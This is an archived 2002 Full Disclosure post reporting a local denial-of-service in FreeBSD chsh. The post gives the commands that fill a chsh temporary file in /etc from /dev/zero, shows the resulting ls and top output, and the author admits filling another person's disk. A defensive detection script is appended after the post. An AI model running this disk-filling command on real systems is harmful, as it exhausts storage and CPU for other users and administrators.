Full Disclosure mailing list archives
FBSD chsh DoS
From: full-disclosure () lists netsys com (Charles Stevenson)
Date: Thu, 15 Aug 2002 13:00:38 -0600
I found an interesting couple of related DoS to do against chsh on FBSD. Basically chsh creates a temporary file in /etc and then launches a user defined EDITOR. Anyways I couldn't find a way to exploit it but I did find a way to be annoying.

tty1$ chsh

Even if you just launch vi you can get the name of the temporary file it created in /etc or just do ls.

ls -l /etc/pw.a1MwaM
-rw-------  1 core  core  330088448 Aug 15 01:44 /etc/pw.a1MwaM

Er that's after I was being annoying hehehe... filled 60G on phased machine. Sorry phased! :D

tty2$ cat /dev/zero > /etc/pw.a1MwaM

Then go back to your vi session in chsh and :wq!...

The results are that basically root can't even remove the file while it's being written to and of course lots of cpu overload abounds. Anyways quotas will stop this but how many admins put user quotas on filesystems that users aren't supposed to be writing to?

  PID USERNAME PRI NICE  SIZE   RES STATE   TIME   WCPU    CPU COMMAND
14139 core      55    0 1140K  612K RUN    12:55 90.23% 90.23% chsh
14171 core      30    0 1912K  976K RUN     0:01  7.81%  2.83% top
13083 root       2    0  356K    0K nfsd    3:00  0.00%  0.00% nfsd

peace,
core

--
Charles Stevenson (core) <core () bokeoa com>
Lab Assistant, College of Eastern Utah San Juan Campus
http://www.bokeoa.com/~core/core.asc
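A defensive check for the condition described in the message above, as an added example that is not part of the original post: it flags pw.* temporary files that have grown far past the size of a password entry. The function name `scan_pw_tmp`, the pw.* naming pattern (taken from the post's /etc/pw.a1MwaM) and the size thresholds are assumptions; the sample files are constructed in a scratch directory that stands in for /etc.

```shell
#!/bin/sh
# Added example, not from the original post. Assumptions: temp files are
# named pw.* as in the post's /etc/pw.a1MwaM; the 64 KiB default limit is an
# illustrative threshold (a passwd entry is far smaller than that).

# scan_pw_tmp DIR [MAX_BYTES]
# Prints "path uid=N size=N" for every regular file DIR/pw.* larger than
# MAX_BYTES. Returns 1 if anything was flagged, 0 otherwise.
scan_pw_tmp() {
    dir=$1
    max=${2:-65536}
    flagged=0
    for f in "$dir"/pw.*; do
        # Skip the unexpanded glob, directories and symlinks.
        if [ ! -f "$f" ] || [ -L "$f" ]; then continue; fi
        # ls -ln works on BSD and GNU: field 3 = owner uid, field 5 = size.
        info=$(ls -ln "$f" | awk '{print $3, $5}')
        uid=${info% *}
        size=${info#* }
        if [ "$size" -gt "$max" ]; then
            echo "$f uid=$uid size=$size"
            flagged=1
        fi
    done
    return "$flagged"
}

# Constructed demo in a scratch directory (stands in for /etc).
demo=$(mktemp -d)
printf 'core:/bin/sh\n' > "$demo/pw.a1MwaM"   # normal-sized temp file
dd if=/dev/zero of="$demo/pw.Zq3xY9" bs=1024 count=8 2>/dev/null  # oversized
scan_pw_tmp "$demo" 4096 || echo "oversized pw.* temp file(s) found"
rm -rf "$demo"
```

Run from cron against the real directory, the non-zero return status can drive an alert; the user quotas the post mentions remain the control that actually stops the disk from filling.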